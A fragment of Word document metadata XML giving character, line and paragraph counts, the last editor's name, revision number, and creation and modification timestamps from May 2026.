  <Characters>8466</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>320</Lines>
  <Paragraphs>262</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company/>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>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Kenneth Gates</cp:lastModifiedBy>
  <cp:revision>3</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-05-04T00:47:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-05-04T00:47:00Z</dcterms:modified>
</cp:coreProperties>
</file>